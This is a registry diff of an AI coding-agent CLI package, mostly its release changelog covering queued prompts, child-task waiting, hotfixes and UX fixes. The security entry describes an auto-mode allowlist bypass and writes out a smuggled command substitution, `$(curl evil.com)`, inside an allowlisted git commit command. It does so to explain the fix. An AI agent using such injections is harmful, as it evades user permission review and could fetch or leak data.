@kodax-ai/kodax-cli 0.7.38

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (44)
  1. package/CHANGELOG.md +1304 -0
  2. package/LICENSE +191 -0
  3. package/README.md +1167 -0
  4. package/README_CN.md +631 -0
  5. package/dist/builtin/code-review/SKILL.md +63 -0
  6. package/dist/builtin/git-workflow/SKILL.md +84 -0
  7. package/dist/builtin/skill-creator/SKILL.md +122 -0
  8. package/dist/builtin/skill-creator/agents/analyzer.md +12 -0
  9. package/dist/builtin/skill-creator/agents/comparator.md +13 -0
  10. package/dist/builtin/skill-creator/agents/grader.md +13 -0
  11. package/dist/builtin/skill-creator/references/schemas.md +227 -0
  12. package/dist/builtin/skill-creator/scripts/aggregate-benchmark.d.ts +46 -0
  13. package/dist/builtin/skill-creator/scripts/aggregate-benchmark.js +209 -0
  14. package/dist/builtin/skill-creator/scripts/analyze-benchmark.d.ts +46 -0
  15. package/dist/builtin/skill-creator/scripts/analyze-benchmark.js +289 -0
  16. package/dist/builtin/skill-creator/scripts/compare-runs.d.ts +62 -0
  17. package/dist/builtin/skill-creator/scripts/compare-runs.js +333 -0
  18. package/dist/builtin/skill-creator/scripts/generate-review.d.ts +33 -0
  19. package/dist/builtin/skill-creator/scripts/generate-review.js +415 -0
  20. package/dist/builtin/skill-creator/scripts/grade-evals.d.ts +73 -0
  21. package/dist/builtin/skill-creator/scripts/grade-evals.js +405 -0
  22. package/dist/builtin/skill-creator/scripts/improve-description.d.ts +23 -0
  23. package/dist/builtin/skill-creator/scripts/improve-description.js +161 -0
  24. package/dist/builtin/skill-creator/scripts/init-skill.d.ts +14 -0
  25. package/dist/builtin/skill-creator/scripts/init-skill.js +153 -0
  26. package/dist/builtin/skill-creator/scripts/install-skill.d.ts +29 -0
  27. package/dist/builtin/skill-creator/scripts/install-skill.js +176 -0
  28. package/dist/builtin/skill-creator/scripts/package-skill.d.ts +38 -0
  29. package/dist/builtin/skill-creator/scripts/package-skill.js +124 -0
  30. package/dist/builtin/skill-creator/scripts/quick-validate.d.ts +8 -0
  31. package/dist/builtin/skill-creator/scripts/quick-validate.js +166 -0
  32. package/dist/builtin/skill-creator/scripts/run-eval.d.ts +66 -0
  33. package/dist/builtin/skill-creator/scripts/run-eval.js +356 -0
  34. package/dist/builtin/skill-creator/scripts/run-loop.d.ts +49 -0
  35. package/dist/builtin/skill-creator/scripts/run-loop.js +243 -0
  36. package/dist/builtin/skill-creator/scripts/run-trigger-eval.d.ts +58 -0
  37. package/dist/builtin/skill-creator/scripts/run-trigger-eval.js +225 -0
  38. package/dist/builtin/skill-creator/scripts/utils.js +278 -0
  39. package/dist/builtin/tdd/SKILL.md +56 -0
  40. package/dist/index.js +1717 -0
  41. package/dist/kodax_cli.js +1870 -0
  42. package/package.json +122 -0
  43. package/scripts/kodax-bin.cjs +27 -0
  44. package/scripts/production-env.cjs +16 -0
package/CHANGELOG.md ADDED
@@ -0,0 +1,1304 @@
1
+ # Changelog
2
+
3
+ All notable changes to this project will be documented in this file.
4
+
5
+ > Full history for versions prior to v0.7.0: [CHANGELOG_ARCHIVE.md](docs/CHANGELOG_ARCHIVE.md)
6
+
7
+ ## [Unreleased]
8
+
9
+ <!-- last-sync: e7a223f -->
10
+
11
+ ---
12
+
13
+ ## [0.7.38] - 2026-05-11
14
+
15
+ ### Theme
16
+
17
+ **Nine-feature delivery — Queued Prompt Injection Latency & Mid-Turn UX Parity, Write-Child Mutation Context Injection, TodoList Visibility & LLM Self-Seeding Parity, Bash AST Migration, LLM-backed Bash Prefix Extractor, Universal `--help` Fast-Path, Chat-While-Waiting, Idle-Wait Visual Continuity, Windows / macOS Case-Insensitive Workspace Match.** v0.7.38's RC snapshot (2026-05-09) shipped the originally-planned three-feature delivery: closing the "queued prompt feels laggy" gap users hit in v0.7.37 by removing four cumulative latency sources and adding three Claude-Code-style mid-turn UX surfaces (FEATURE_149); correcting the long-standing under-injection where parallel write children silently skipped the project's `AGENTS.md` mutation policy because they shared the read-child minimal system prompt (FEATURE_117 v2); and closing the FEATURE_097 coverage gap where users almost never saw the realtime todo list (FEATURE_151). Between the RC and final release, six additional pieces landed and ship in the same `0.7.38` version: security hardening (FEATURE_152/153/154 — closing Issue 129 follow-up + auto-mode allowlist injection vulnerability), V2 Worker default flip (FEATURE_114 Slice 6/7/8), full Chat-While-Waiting delivery with idle-yield wait pattern + 7-bug hotfix chain (FEATURE_155), idle-wait visual continuity (FEATURE_156), Windows / macOS case-insensitive workspace match for `kodax -c` (FEATURE_157), and a UX polish pass that suppresses harness lifecycle markers in the transcript by default for chat-while-waiting flow parity with Claude Code. Configuration cleanup: KodaX no longer reads `CLAUDE.md` as a fallback when `AGENTS.md` is absent — `CLAUDE.md` is Claude-Code-specific project guidance and injecting it into the KodaX agent context produces semantic mismatch (KodaX's own repo dogfood-bit this).
18
+
19
+ ### Added (post-RC — landed 2026-05-09 → 2026-05-11)
20
+
21
+ **Security hardening** (Issue 129 follow-up):
22
+
23
+ - **FEATURE_152 — Bash command parsing regex → AST migration**. Replaces the strip-then-classify regex pipeline with `shell-quote@1.8.3` AST parsing in `packages/repl/src/permission/bash-ast.ts`. Output is a structured `BashCommandTree` (statements / pipelines / argv / redirections + `unparseable: true` fail-closed flag). `isBashReadCommand` / `isBashWriteCommand` fully migrated to AST; `extractPathsFromCommand` / `collectBashWriteTargets` are AST + Windows-path regex hybrid (shell-quote POSIX-escape eats backslash paths). 14 attack-surface hardening tests. ADR-023 records the decision; Issue 129 follow-up notes mark the hotfix-era strip-then-classify as superseded by structural fix.
24
+ - **FEATURE_153 — LLM-backed bash prefix extractor**. New module `packages/coding/src/guardrails/auto-mode/bash-prefix-extractor.ts` (~400 LoC). Replaces naive `command.startsWith(pattern)` allowlist matching — the previous behaviour allowed `git commit -m "x" $(curl evil.com)` to match `Bash(git commit:*)` and bypass auto-mode review. New path lifts CC's `BASH_POLICY_SPEC` prompt, runs Haiku-grade LLM extraction with LRU cache (200 entries), fails closed to user confirmation on extractor error. `isToolCallAllowed` migrated sync → async with optional `extractor?` parameter. All 4 production call sites switched in one cutover (REPL / InkREPL / ACP server / executor.ts).
25
+ - **FEATURE_154 — Universal `--help` fast-path**. Generalises CC's `isHelpCommand` past KodaX's 12-tool hardcoded list. Any `<cmd> --help` (token-validated, no quotes, no shell metacharacters) bypasses the LLM extractor — saves token cost + latency for `docker --help` / `kubectl --help` / `terraform --help` / etc. ~50 LoC pure function added at the top of `isBashReadCommand`.
26
+
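To make the FEATURE_153 bypass and the FEATURE_154 fast-path concrete, here is a minimal sketch. It is not the KodaX implementation: `naiveAllowlistMatch`, `isSimpleHelpCommand`, and the `SAFE_TOKEN` character set are hypothetical names and choices, and the sketch assumes that "token-validated" means every whitespace-separated token must come from a conservative character whitelist.

```typescript
// Hypothetical helpers for illustration only; names and the token whitelist
// are assumptions, not taken from the KodaX source.

// Prefix-only allowlist matching of the kind the changelog says was replaced.
function naiveAllowlistMatch(command: string, allowedPrefix: string): boolean {
  return command.startsWith(allowedPrefix);
}

// Tokens may contain only characters that cannot start quoting, substitution,
// chaining, or redirection in a POSIX shell.
const SAFE_TOKEN = /^[A-Za-z0-9_.\/:-]+$/;

// Conservative "<cmd> ... --help" detector: split on spaces/tabs only, require
// the last token to be exactly --help, and reject any token outside the whitelist.
function isSimpleHelpCommand(command: string): boolean {
  const tokens = command.trim().split(/[ \t]+/);
  if (tokens.length < 2 || tokens[tokens.length - 1] !== "--help") {
    return false;
  }
  return tokens.every((token) => SAFE_TOKEN.test(token));
}

// The prefix check accepts a command that carries a command substitution.
const injected = 'git commit -m "x" $(curl evil.com)';
console.log(naiveAllowlistMatch(injected, "git commit")); // true (the bypass)
console.log(isSimpleHelpCommand("docker --help"));
console.log(isSimpleHelpCommand("docker --help;ls --help"));
```

A whitelist is used here rather than a blacklist of metacharacters because it fails closed: any character the sketch does not recognise disqualifies the command from the fast-path.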
27
+ **Architecture (V2 default flip + new orchestration primitive)**:
28
+
29
+ - **FEATURE_114 Slice 6/7/8 — V2 Worker chain becomes default**. The V2 Worker-merge harness (Scout/Worker/Evaluator, replacing V1's Scout/Planner/Generator/Evaluator) was opt-in behind `KODAX_HARNESS_V2` in earlier versions. Slice 6 baseline eval; Slice 7 default flip (now ON unless explicit `KODAX_HARNESS_V2=false`); Slice 8 apples-to-apples V1 vs V2 comparison eval. Breaking-only-by-default: callers can opt back into V1 via env flag.
30
+ - **FEATURE_155 — Chat-While-Waiting (full Phase A → D delivered in v0.7.38)**. Removes `await_child_task` and adopts CC's idle-yield wait pattern: Worker emits a one-line status with no tool calls, runner-driven outer loop blocks on the next external wake event (child completion / inbound user message / abort), resumes Worker with a synthetic `<task-completed task_id="…">…</task-completed>` user message. Same MessageQueue carries both events; `priority='user'` (typed input) wins over `priority='background'` (child notification) in the same drain cycle — users chat with the agent while children are in flight. Originally scoped to v0.7.39; merged into v0.7.38 to ship together with the hotfix follow-ups below. Phases:
31
+ - **A1** — `idle-yield.ts` foundation utilities (`detectIdleYield` predicate, `waitForWakeEvent` 3-way race, `composeIdleYieldUserMessage` synthetic-message builder, `countLastAssistantToolCalls` snapshot helper). 33 unit tests pin every boundary. Commit `6a420504`.
32
+ - **A2** — Runner-driven outer loop wraps `Runner.run` in `while(true)`; on idle-yield exit, calls `waitForWakeEvent`, splices the wake content into the next user turn, re-enters `Runner.run`. Defensive `IDLE_YIELD_MAX_ITERATIONS=64` floor. 35 tests. Commits `1f0d1eab` / `bbf747d3`.
33
+ - **B1** — Worker prompt + `dispatch_child_task` banner teach idle-yield. Layer 2 single-turn eval (3 cases × 5 aliases × 5 reps). First run PARTIAL (2/4 aliases ≥80%); rerun added `zhipu/glm51` and met SHIP gate (3/5 ≥80%). Default `KODAX_IDLE_YIELD` flipped to ON. Commits `3828265f` / `016e3fb2` / `1a08de10` / `6a63d986`.
34
+ - **B2** — V2 Worker chain drops `awaitChildTask` from its tool list. Commit `3830141b`.
35
+ - **C1** — Full tool removal: `await-child-task.ts` deleted; `registry.ts` / `tool-permission.ts` / `child-executor.ts` `CHILD_EXCLUDE_TOOLS_BASE` / V1 chain validation cleaned up. Commit `80410e49`.
36
+ - **C2** — `YIELD_TOOL_NAMES` Set emptied; `midTurnDrainPriority` retires the yield-tool gate (outer loop owns background-priority dequeue now). Commit `c8990094`.
37
+ - **C3** — `KODAX_IDLE_YIELD` env-flag retired; `isIdleYieldEnabled()` hard-coded to `true`. Commit `35468f9f`.
38
+ - **D1** — design doc + CHANGELOG + FEATURE_LIST + test guide. Commit `292d3e51`.
39
+ - **D2** — Layer 2 chat-while-waiting behavioral eval (perception budget) + final regression sweep + retire `tests/feature-148-post-dispatch-probe.eval.ts` to `tests/_archive/`. Commit `3efae389`.
40
+
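The shared-queue behaviour described for FEATURE_155 can be sketched as follows. This is an illustration under assumptions: `QueuedMessage`, `drainCycle`, and `composeTaskCompleted` are hypothetical names, and the sketch interprets "user wins over background" as "user messages are delivered first within one drain cycle"; the real `MessageQueue` and `composeIdleYieldUserMessage` may behave differently.

```typescript
// Hypothetical model of a single queue carrying both typed input and
// child-completion notifications. Names and ordering policy are assumptions.
type Priority = "user" | "background";

interface QueuedMessage {
  priority: Priority;
  content: string;
}

// Drains the queue in place and returns messages in delivery order:
// all user-priority messages first, then background notifications.
function drainCycle(queue: QueuedMessage[]): QueuedMessage[] {
  const user = queue.filter((m) => m.priority === "user");
  const background = queue.filter((m) => m.priority === "background");
  queue.length = 0;
  return [...user, ...background];
}

// Builds the synthetic user message format quoted in the changelog entry.
function composeTaskCompleted(taskId: string, summary: string): string {
  return `<task-completed task_id="${taskId}">${summary}</task-completed>`;
}

const queue: QueuedMessage[] = [
  { priority: "background", content: composeTaskCompleted("child-1", "review done") },
  { priority: "user", content: "also check the README" },
];
const delivered = drainCycle(queue);
console.log(delivered.map((m) => m.priority)); // user first, then background
```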
41
+ **FEATURE_155 hotfix follow-up chain (2026-05-11 — found in production, fixed before release)**:
42
+
43
+ Production trace showed Evaluator emitting `emit_verdict` accept before children returned, then receiving duplicate `<task-completed>` notifications that drove degenerate LLM turns up to `IDLE_YIELD_MAX_ITERATIONS=64`. Four commits resolved 7 distinct bugs uncovered during deep review:
44
+
45
+ - **Bug A — child registry never cleaned up after settle** (`c1bdaf4`). Slice C1 deleted `await_child_task` which previously called `registry.delete(taskId)` at reclaim time. No compensating cleanup on the idle-yield path. Fix: dispatch IIFE chains `.finally(() => registry.delete(childId)).catch(() => {})`.
46
+ - **Bug B — outer loop didn't gate on terminal Evaluator verdict** (`c1bdaf4` initial, `3494a27` corrected). After Evaluator emit_verdict accept, the loop kept re-entering `Runner.run` for every pending-child wake event. Initial fix read `managedProtocolPayloadRef.current?.verdict?.status`; deep review uncovered that V2's dedicated `emit_verdict` tool returns `metadata` but does NOT call `ctx.emitManagedProtocol(...)`, so that ref stays `undefined` for the entire run — the initial gate was a silent no-op. Real fix: read from `recorder.verdict?.payload?.verdict?.status` (the canonical chain state, written by `wrapEmitterWithRecorder`).
47
+ - **Bug C — Evaluator prompt missing wait-for-children discipline** (`c1bdaf4`). Evaluator prompt updated with a `CHILD-TASK WAIT DISCIPLINE` block; `user_answer` requirement strengthened.
48
+ - **Bug D — `hasEmittedHandoff` source-of-truth latent bug** (`3494a27`). The same misread of `managedProtocolPayloadRef` existed in the pre-FEATURE_155 Slice A2 wiring; hidden by `lastAssistantToolCallCount > 0` short-circuiting the happy path. Fixed alongside Bug B's corrected source.
49
+ - **Bug E — fast-child race** (`3ccf322`). Child completing during a Runner.run iteration could see its `.finally(delete)` run BEFORE the outer-loop snapshot, leaving `pendingChildTaskCount=0` and stranding the banner in the background queue. Fix: `IdleYieldSnapshot.hasPendingBackgroundMessages` keeps the loop alive whenever EITHER the registry or the queue still has something undelivered.
50
+ - **Bug F — abort listener accumulation in `waitForWakeEvent`** (`3ccf322`). `{once:true}` only auto-removed on abort fire; non-abort wakes left the listener attached. Over `IDLE_YIELD_MAX_ITERATIONS=64` on the same long-lived signal, listeners piled up silently (AbortSignal is an EventTarget — no MaxListeners warning). Fix: capture handler + `removeEventListener` in `settle()`.
51
+ - **Bug G — Scout-label preflight leak into V2** (`3ccf322`). `status-bar.ts:275` hardcoded `Scout - ${managedWorkerTitle}` during preflight, stamping "Scout -" onto every V2 session because `managedWorkerTitle` is now "Worker" on V2. The `f23a7cb1` Slice 7 follow-up fixed 4 other call sites but missed this one. Fix: use `managedWorkerTitle` directly with "Scout" fallback.
52
+
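Bug F's fix pattern (capture the abort handler and remove it in `settle()`) can be sketched as below. This is not the real `waitForWakeEvent`: `waitForWake`, `AbortLike`, and `CountingSignal` are hypothetical, and the signal is modelled by a minimal interface so that listener counts can be observed, which a real `AbortSignal` does not expose.

```typescript
// Minimal stand-in for the subset of AbortSignal used here (an assumption).
interface AbortLike {
  addEventListener(type: "abort", handler: () => void): void;
  removeEventListener(type: "abort", handler: () => void): void;
}

type WakeReason = "wake" | "abort";

// Races an abort against a non-abort wake source. Whichever fires first
// settles the promise, and settle() always detaches the abort handler so
// repeated waits on one long-lived signal do not accumulate listeners.
function waitForWake(
  signal: AbortLike,
  subscribeWake: (onWake: () => void) => void,
): Promise<WakeReason> {
  return new Promise<WakeReason>((resolve) => {
    let settled = false;
    const settle = (reason: WakeReason): void => {
      if (settled) return;
      settled = true;
      signal.removeEventListener("abort", onAbort);
      resolve(reason);
    };
    const onAbort = (): void => settle("abort");
    signal.addEventListener("abort", onAbort);
    subscribeWake(() => settle("wake"));
  });
}

// Fake signal that counts attached handlers, for demonstration only.
class CountingSignal implements AbortLike {
  private handlers = new Set<() => void>();
  addEventListener(_type: "abort", handler: () => void): void {
    this.handlers.add(handler);
  }
  removeEventListener(_type: "abort", handler: () => void): void {
    this.handlers.delete(handler);
  }
  get listenerCount(): number {
    return this.handlers.size;
  }
}

const signal = new CountingSignal();
let wake: () => void = () => {};
for (let i = 0; i < 64; i++) {
  void waitForWake(signal, (onWake) => { wake = onWake; });
  wake(); // non-abort wake: the abort handler is detached in settle()
}
console.log(signal.listenerCount);
```

Relying on `{ once: true }` alone would only detach the handler when the abort event itself fires, which is the accumulation path the changelog describes.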
53
+ **UX polish + drift cleanup**:
54
+
55
+ - **FEATURE_156 — Idle-wait visual continuity** (`8488f8f` — `docs/features/v0.7.38.md#feature_156`). Status bar surfaces "{role} - waiting for N children" while the outer loop is parked in `waitForWakeEvent`, distinguishing alive-suspended from terminated. Two new optional fields on `KodaXManagedTaskStatusEvent` (`idleWaiting` + `idleWaitingPendingCount`); new `ObserverBridge.idleWaiting(role, count)` method; agent-agnostic role lookup via `currentAgent.name`. 10 tests; backwards-compat (purely additive fields).
56
+ - **FEATURE_151 Slice C correction** (`1c63072`). Re-verification of `c:/Works/claudecode/src/` revealed the original Slice C "persistent visibility" rationale misread CC's gate composition (CC actually hides the list at run-end by default — Spinner-internal mount + `expandedView==='tasks'` toggle defaulting to 'none'). Fix: re-gate TodoListSurface mount on `isLoading` and clear `todoItems` on the true→false transition so a stale list doesn't flash back at the next prompt. View-model unchanged.
57
+ - **FEATURE_157 — Windows-aware session-list path comparison** (this batch). Session-list filter in `storage.ts:list()` was doing literal `sessionGitRoot === currentGitRoot` comparison. Drive-letter case differences across shells (`C:/...` saved vs `c:/...` looked-up — happens when sessions are saved from one PowerShell and listed from a VS Code-spawned shell on Windows / case-insensitive macOS) caused the filter to exclude all prior same-repo sessions, leaving `kodax -c` / `kodax -r` with nothing to resume. Symptom: "the previous conversation seems lost, agent answered from scratch with no context". Fix: `pathsEqual()` helper folds case on win32 + darwin; POSIX-strict equality preserved on Linux. Reproduces on 4-session timestamp ladder where all sessions stored uppercase drive letter but a 13:02 `kodax -c` shell returned lowercase.
58
+ - **Harness lifecycle markers suppressed in transcript by default** (`KODAX_TRANSCRIPT_HARNESS_MARKERS=1` to restore). Three transcript artefacts that interrupted the chat flow during chat-while-waiting are now off by default: (1) `> AMA H<n> - Task completed` breadcrumb from `buildManagedLiveEventDrafts`; (2) `[Scout] Completion marked uncertain — signals: ...` warning from `onScoutSuspiciousCompletion`; (3) `[Task completed]` post-task summary label from `buildManagedTaskTranscriptItems`. Parity with Claude Code, which signals turn end via spinner halt rather than transcript text. **The harness itself is unchanged** — Scout/Worker/Evaluator routing, idle-yield wait, mutation guard, capability sections, message queue, child registry, and all FEATURE_155 hotfix invariants are untouched; only the transcript visualization layer is gated. Symptom motivation: when users typed a follow-up while the agent was still running, the queued prompt landed under "Task completed" + "Completion uncertain" lines on the next render, making continuous chat read like a hard task boundary. Set the env flag to restore the legacy persistence for session-replay debugging where explicit turn anchors are useful.
59
+
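The FEATURE_157 comparison rule (fold case on win32 and darwin, strict equality elsewhere) can be sketched like this. The real `pathsEqual()` helper may normalise paths further; this version takes the platform as an explicit parameter, which is an assumption made to keep the example testable.

```typescript
// Hypothetical reimplementation for illustration; the helper in storage.ts
// may differ (for example in separator or trailing-slash handling).
function pathsEqual(a: string, b: string, platform: string): boolean {
  const caseInsensitive = platform === "win32" || platform === "darwin";
  return caseInsensitive ? a.toLowerCase() === b.toLowerCase() : a === b;
}

// Drive-letter case differs between the shell that saved the session and
// the shell that lists it.
console.log(pathsEqual("C:/Works/repo", "c:/Works/repo", "win32"));
console.log(pathsEqual("/home/me/Repo", "/home/me/repo", "linux"));
```

In a Node.js caller the third argument would typically be `process.platform`.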
60
+ ### Added (RC — 2026-05-09)
61
+
62
+ - **FEATURE_149 — Queued Prompt Injection Latency & Mid-Turn UX Parity** — Three slices, all in v0.7.38:
63
+ - **Slice A (latency cleanup, zero behavior change)**: Removed the legacy 50ms `setTimeout` floor in `stageQueuedPrompt` (`packages/repl/src/ui/InkREPL.tsx`); added an mtime-keyed file-content cache to `loadAgentsFiles` (`packages/coding/src/context/agents-loader.ts`) so per-round AGENTS.md walks are O(stat) once warmed instead of O(read+parse). Round-N → round-N+1 handoff floor measured at < 5ms (`packages/repl/src/ui/utils/queued-prompt-sequence-latency.test.ts` micro-bench), down from a 53ms minimum.
64
+ - **Slice B (behavioral changes, prompt-eval-gated)**:
65
+ - **B1 — Interruptible-tool fast-abort (infrastructure-ready, no tool opt-in)**: Tools may now declare `interruptBehavior: 'cancel' | 'wait'`; default is `'wait'`. The `handleSubmit` fast-abort path is wired so that when an in-flight tool is `'cancel'`-tagged, a newly submitted prompt aborts the active round immediately (preserving the freshly submitted prompt via the new `abort({ preservePendingInputs: true })` option) and the user redirects within ~500ms of `Enter`. **No built-in tool is currently tagged `'cancel'`** — fact-check of `c:/Works/claudecode/src/` showed CC's `interruptBehavior` interface exists in `Tool.ts:416` but **zero** concrete tools (`BashTool` / `FileEditTool` / `TaskGetTool` / `TaskOutputTool` / etc.) opt in. CC's `hasInterruptibleToolInProgress` requires `every(t => 'cancel')`, so in production it almost never fires. KodaX matches CC's conservative posture: SIGTERM-mid-bash leaves half-written files / half-pushed git / half-mutated databases, and aborting `await_child_task` orphans the FEATURE_119 Pattern B background child. The infrastructure (type + field + fast-abort path + `preservePendingInputs` option) is in place for future side-effect-free wait-only tools (Sleep / Wait / Schedule) to opt in. Esc remains the explicit user-side abort gesture.
66
+ - **B3 — Batched drain**: `runQueuedPromptSequence` now coalesces all pending follow-ups into a single batched user message joined by `\n\n---\n\n`, so N pending prompts collapse to **one** agent invocation rather than N. Drives both cost reduction and better LLM-side coherence (the model sees all sub-tasks at once and can interleave/parallelize). Backed by `tests/feature-149-batched-drain.eval.ts` (5 alias × 4 case = 20 cells; stage-1 acceptance: alias mean ≥ 75% pass per case, max-min spread ≤ 20pp).
67
+ - **Slice C (UX surface, pure UI)**:
68
+ - **C1 — Up-arrow popAllEditable**: Pressing ↑ when the input is empty pops the entire pending-prompts queue back into the editor, joined by blank lines, so the user can edit / reorder / delete and resubmit. The hint line below the queue surface advertises the gesture.
69
+ - **C2 — Multi-line queue render**: Queue is shown as `[i/N] preview` rows in `QueuedCommandsSurface` (one per pending input), replacing the single-line summary. Esc still drops the latest entry.
70
+ - **C3 — Line-buffered streaming render** (added during implementation after CC naturalness investigation): While a model token stream is in flight, only complete lines (those ending in `\n`) are rendered to the transcript live area. The currently-being-typed trailing line is suppressed until its newline arrives, mirroring Claude Code's [`REPL.tsx:1473`](c:/Works/claudecode/src/screens/REPL.tsx#L1473) `streamingText.substring(0, streamingText.lastIndexOf('\n') + 1)` pattern. Eliminates character-level flicker (especially noticeable on Windows conhost / reduced-motion terminals); the full final response still lands in transcript history when the round completes (no tail content lost). Implementation: 1 file, ~10 LoC at [`transcript-layout.ts:757`](packages/repl/src/ui/utils/transcript-layout.ts#L757); 3 new pinning tests.
71
+ - **C4 — `activeForm`-driven spinner** (added during implementation after CC naturalness investigation): The spinner status line now reads `currentTodo?.activeForm` from the in-progress todo and uses it as the leader verb (e.g. `[Plan] Running failing tests...`). Mirrors Claude Code's [`Spinner.tsx:169`](c:/Works/claudecode/src/components/Spinner.tsx#L169) `currentTodo?.activeForm` lookup. Implementation: `TodoItem` gains a `readonly activeForm?: string` field; `TodoStore.updateStatus(id, status, note?, activeForm?)` accepts the new arg with preserve-vs-replace semantics matching `note`; `todo_update` tool schema gains the `activeForm` parameter and the schema description instructs the LLM to "ALWAYS supply activeForm when transitioning to in_progress" (present-continuous form of the item content); Scout / Generator role-prompts include the same guidance; spinner cascade puts activeForm priority above `currentTool` / `isThinking` but below `isCompacting` / detailed tool block. The user sees task-level "what is the agent doing right now" without waiting for the round to end. Implementation: 7 files, ~50 LoC; 6 new pinning tests across todo-store + transcript-layout.
72
+ - **C5 — Bash live progress (`renderToolUseProgressMessage` parity)** (added during implementation after CC naturalness investigation): Long-running `bash` commands now stream their stdout/stderr tail to the spinner / tool-call display via `ctx.reportToolProgress`, matching Claude Code's [`BashTool.renderToolUseProgressMessage`](c:/Works/claudecode/src/tools/BashTool/BashTool.tsx) + `BashModeProgress.tsx`. Users see `npm test` / `cargo build` / `pytest` output tail live instead of a 30-second silent wait. Infrastructure was already wired (`KodaXToolExecutionContext.reportToolProgress` + `KodaXEvents.onToolProgress`); this commit only adds the bash-side feed: a 1KB UTF-8 tail buffer (separate from the 512KB capture collector to keep cost negligible), throttled to ~10 fps, displaying the last 3 non-empty lines joined by ` | ` and capped at ~120 chars. stderr also feeds the tail (npm/cargo/pytest progress output is on stderr). Fully back-compat: `reportToolProgress` undefined → no-op, all existing bash tests pass. Implementation: 1 file, ~40 LoC at [`bash.ts:229`](packages/coding/src/tools/bash.ts#L229); 3 new pinning tests.
73
+ - **C6 — Slash-command mid-task guard** (added after the 14-dimension queue parity audit): Slash commands typed while a task is in flight are no longer queued — they're rejected with an inline notice ("Slash commands cannot be queued mid-task. Press Esc to abort the current task, then run the command."). Mirrors Claude Code's invariant that slash commands act on the live REPL (mode switch, `/clear`, `/cost`, `/agents`, etc.) and have no defined semantics when delivered as a queued user message: a queued `/clear` would be sent to the LLM as the literal string `/clear`, not actually clear the transcript. Detection point is `InkREPL.tsx:6571` in the `handleSubmit` `isLoading` branch (right before pending-input enqueue), keyed off `fullText.trimStart().startsWith('/')`. Plain prompts continue to queue normally; only slash-prefixed input is gated. Closes the only P0 GAP from the 14-dimension queue parity audit (12/14 ALIGNED, 1/14 N/A — no remote session feature in KodaX, 1/14 was this slash gap, now fixed). Implementation: 1 file, ~8 LoC; design doc records the audit table and behavioral rationale.
74
+ - Test guide: `docs/test-guides/FEATURE_149_v0.7.38_TEST_GUIDE.md`. Design doc: `docs/features/v0.7.38.md#feature_149-queued-prompt-injection-latency--mid-turn-ux-parity`.
75
+
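Three of the FEATURE_149 string transformations are simple enough to sketch: the B3 batched-drain join, the C3 complete-lines-only render, and the C5 progress tail. Function names are hypothetical, and the tail sketch assumes the ~120-character cap truncates from the end of the joined string, which the changelog does not specify.

```typescript
// Separator quoted in the changelog for batched drain.
const BATCH_SEPARATOR = "\n\n---\n\n";

// B3: collapse N pending prompts into one user message.
function batchQueuedPrompts(pending: readonly string[]): string {
  return pending.join(BATCH_SEPARATOR);
}

// C3: keep only text up to and including the last newline, so the line
// still being streamed is withheld until its newline arrives.
function completeLinesOnly(streamingText: string): string {
  return streamingText.substring(0, streamingText.lastIndexOf("\n") + 1);
}

// C5: last few non-empty lines joined by " | ", capped in length.
// The truncation direction is an assumption.
function formatProgressTail(tail: string, maxLines = 3, maxChars = 120): string {
  const lines = tail
    .split("\n")
    .map((line) => line.trim())
    .filter((line) => line.length > 0);
  const joined = lines.slice(-maxLines).join(" | ");
  return joined.length > maxChars ? joined.slice(0, maxChars) : joined;
}

console.log(JSON.stringify(batchQueuedPrompts(["fix the test", "then update docs"])));
console.log(JSON.stringify(completeLinesOnly("line one\npartial li")));
console.log(formatProgressTail("a\n\nb\nc\nd\n"));
```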
76
+ - **FEATURE_117 v2 — Write-Child Mutation Context Injection** — Replaced v1's invalidated "strip read-path context" design with the inverse: write children now inherit the project's `AGENTS.md` mutation policy that the parent agent already follows. Rationale: `child-executor.ts` write and read children both used the bare `CHILD_AGENT_SYSTEM_PROMPT` (~500 tokens, no project rules) because `systemPromptOverride` short-circuits `buildSystemPrompt`. v1 assumed children were inheriting the parent's full 5.2k-token stable context and wanted to strip — Phase 3 fact-check disproved that, but surfaced the real gap: write children silently violated project rules (no-`any`, no-hardcoded-config, conventional-commit format) because they couldn't see them. v2 adds a single `buildWriteSystemPrompt(parentCtx.gitRoot)` helper (~17 LoC) that prepends the bare base prompt with a one-line framing sentence and the formatted `AGENTS.md` block. Lookup walks from `parentCtx.gitRoot`, **not** the worktree path — worktrees are transient checkouts that don't carry untracked `AGENTS.md` files. Read children stay on the bare prompt (read tasks don't mutate; rules don't apply). Cost is amortized via FEATURE_149's mtime cache (single disk read per fan-out wave) and FEATURE_116's `cache_control: ephemeral` (single billing per 5-min window). Test guide: `docs/test-guides/FEATURE_117_v0.7.38_TEST_GUIDE.md`. Design doc: `docs/features/v0.7.38.md#feature_117-v2-write-child-mutation-context-injection`. 4 new unit cases pin behavior (write-inject / no-AGENTS-md fallback / read-stays-minimal / lookup-uses-parent-gitRoot / undefined-gitRoot graceful no-op).
77
+
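The shape of the write-child prompt described in FEATURE_117 v2 might look like the sketch below. It is an assumption-heavy illustration: the real `buildWriteSystemPrompt` takes `parentCtx.gitRoot` and loads `AGENTS.md` itself, whereas this version receives the file content as a parameter; the base prompt text and the framing sentence are placeholders. The ordering (base prompt first) is inferred from the changelog's advice to SDK consumers to assert with `startsWith`.

```typescript
// Placeholder for the bare child prompt; the real text is not reproduced here.
const BASE_PROMPT_PLACEHOLDER = "You are a child agent. Complete the assigned task.";

// Hypothetical framing sentence; the real wording is unknown.
const FRAMING_PLACEHOLDER = "Follow the project rules below when mutating files.";

// Returns the bare prompt when no AGENTS.md content is available, otherwise
// the bare prompt followed by the framing sentence and the rules block.
function buildWriteSystemPromptSketch(agentsMd: string | undefined): string {
  if (agentsMd === undefined || agentsMd.trim() === "") {
    return BASE_PROMPT_PLACEHOLDER;
  }
  return [BASE_PROMPT_PLACEHOLDER, FRAMING_PLACEHOLDER, agentsMd].join("\n\n");
}

const writePrompt = buildWriteSystemPromptSketch("- No `any`.\n- Conventional commits.");
// An SDK consumer that used to assert equality can assert the prefix instead.
console.log(writePrompt.startsWith(BASE_PROMPT_PLACEHOLDER));
```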
78
